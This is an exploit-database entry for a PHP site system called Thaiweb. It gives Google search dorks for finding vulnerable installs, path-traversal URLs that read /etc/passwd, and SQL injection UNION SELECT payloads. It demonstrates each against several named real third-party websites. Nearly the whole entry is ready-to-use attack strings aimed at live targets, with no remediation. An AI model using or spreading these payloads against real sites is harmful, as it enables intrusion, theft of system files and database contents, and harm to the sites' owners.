Thaiweb <= Remote File Inclusion / Sql Injection Vulnerability

2012-12-20T00:00:00
ID 1337DAY-ID-20014
Type zdt
Reporter GoLd_M
Modified 2012-12-20T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: Thaiweb <= Remote File Inclusion Vulnerability
# Date: 19/12/2012
# Author: GoLd_M (Libyan) Page FaceBook (http://www.facebook.com/pages/وَذَكِّـــرْ/337878286310383)
# Category:: Local File Disclosure Vulnerability
# Google Dork: intext:powered by Thaiweb. inurl:index.php?page=board.php 
# Ex :[Thaiweb]/index.php?page=../../../../../../../../../../../../../etc/passwd
# Demo:
# 01 :http://gift.in.th/index.php?page=../../../../../../../../../../../../../etc/passwd
# 02 :http://www.keytasin.com/index.php?page=../../../../../../../../../../../../../etc/passwd
# 03 :http://www.readywebthai.com/index.php?page=../../../../../../../../../../../../../etc/passwd

# Google Dork: intext:powered by Thaiweb. inurl:index.php?page=board.php 
# Ex :[Thaiweb]/index.php?page=boardque.php&bod_id=4'
# Demo:
# 01 :http://www.keytasin.com//index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
# 02 :http://www.autopartnerthailand.com/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
# 03 :http://gift.in.th/index.php?page=boardque.php&bod_id=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--

#  0day.today [2018-01-26]  #